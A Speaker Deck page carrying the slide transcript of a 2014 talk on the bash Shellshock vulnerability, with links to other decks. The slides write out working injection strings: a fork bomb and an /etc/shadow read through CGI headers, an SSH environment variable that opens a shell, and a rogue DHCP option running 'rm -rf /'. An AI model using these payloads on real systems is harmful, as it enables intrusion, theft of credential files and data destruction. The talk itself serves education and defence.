Upgrade to Pro — share decks privately, control downloads, hide ads and more …

ShellShock

Julien Savoie
September 29, 2014
Technology
0
120

 ShellShock

The talk I gave at HASK in 2014 on the vulnerability in bash known as shellshock.

Julien Savoie

September 29, 2014
Tweet

More Decks by Julien Savoie

See All by Julien Savoie
Passwords! Passwords! Passwords! 2022
jsavoie
0
69
Defeating IPv6 privacy extensions
jsavoie
0
120
Bitcoin Barons
jsavoie
0
86
Software defined murder
jsavoie
1
270
Passwords! Passwords! Passwords!
jsavoie
0
320
How to run a dark market
jsavoie
2
350
Encrypting the Cloud
jsavoie
0
51
Attacking the onion router
jsavoie
0
190

Other Decks in Technology

See All in Technology
AI時代のデータセンターネットワーク
lycorptech_jp
PRO
1
280
UI State設計とテスト方針
rmakiyama
2
510
podman_update_2024-12
orimanabu
1
270
10個のフィルタをAXI4-Streamでつなげてみた
marsee101
0
170
Oracle Cloudの生成AIサービスって実際どこまで使えるの? エンジニア目線で試してみた
minorun365
PRO
4
280
[Ruby] Develop a Morse Code Learning Gem & Beep from Strings
oguressive
1
150
Amazon Kendra GenAI Index 登場でどう変わる? 評価から学ぶ最適なRAG構成
naoki_0531
0
110
複雑性の高いオブジェクト編集に向き合う: プラガブルなReactフォーム設計
righttouch
PRO
0
110
How to be an AWS Community Builder | 君もAWS Community Builderになろう!〜2024 冬 CB募集直前対策編?!〜
coosuke
PRO
2
2.8k
KubeCon NA 2024 Recap / Running WebAssembly (Wasm) Workloads Side-by-Side with Container Workloads
z63d
1
240
統計データで2024年の クラウド・インフラ動向を眺める
ysknsid25
2
840
C++26 エラー性動作
faithandbrave
2
730

Featured

See All Featured
Git: the NoSQL Database
bkeepers
PRO
427
64k
Adopting Sorbet at Scale
ufuk
73
9.1k
Unsuck your backbone
ammeep
669
57k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
48
2.2k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
95
17k
The Pragmatic Product Professional
lauravandoore
32
6.3k
How to Think Like a Performance Engineer
csswizardry
22
1.2k
Build The Right Thing And Hit Your Dates
maggiecrowley
33
2.4k
Mobile First: as difficult as doing things right
swwweet
222
9k
Docker and Python
trallard
42
3.1k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
7k
Documentation Writing (for coders)
carmenintech
66
4.5k

Transcript

  1. CVE-2014-6271 CVE-2014-7169 "shellshock"

  2. • Who does it impact? Bash 1.13 to 4.3. If

    you installed bash from between 1992 to now. • Where is bash used?

  3. What's the attack? Define a function within an environment variable,

    whatever you place after will be executed. foo () { ignored; }; my attack code goes here. env bar='() { :; }; echo vulnerable' bash -c 'echo hello world' Output; vulnerable hello world

  4. Common Gateway to Hell • Any calls to cgi (common

    gateway interface) services pass http client header variables as environment variables. Such as "user-agent”, or “referer”. • User-agent switcher for Chrome; () { :; }; (){ :|: & };: • Nameless major vendor; () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/shadow

  5. People are already mass scanning 209.126.230.72 - - [24/Sep/2014:23:53:34 -0300]

    "GET / HTTP/1.0" 200 12761 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/ 2014/09/bash-shellshock-scan-of-internet.html)“

  6. OpenSSH isn't safe • From sshd_config: # Allow client to

    pass locale environment variables AcceptEnv LANG LC_* • This means ForceCommand can be escaped $ env LC_NINJA='() { :; }; /bin/sh' ssh victimhost • SSH_ORIGINAL_COMMAND is set anyways $ ssh victimhost '() { :; }; /bin/sh' • You use "internal-sftp" right? • Why do we care about ForceCommand?

  7. DHCP • dhcpcd/dhclient makes system() calls • Rogue DHCP servers

    can execute arbitrary commands on hosts (usually as uid=0) /etc/dhcp/dhcpd.conf: option default-url "() { :; }; rm -rf /"; • Consider using "ip dhcp snooping vlan 100,110,115,...”

  8. Et tu, Mac OS X? • Bash 3.2.51 is installed

    at /bin/sh • Can be leveraged to get root, suid anyone? • Apple dhcp client does not use system() calls

  9. What have we learned?

  10. What should we have learned? • Widely deployed OSS software

    should be audited, especially if old • Often they are, but not by nice people • Data received from untrusted sources should be sanitized, before used • Switch default shell? /bin/sh -> dash or tcsh • Disable function importing by default?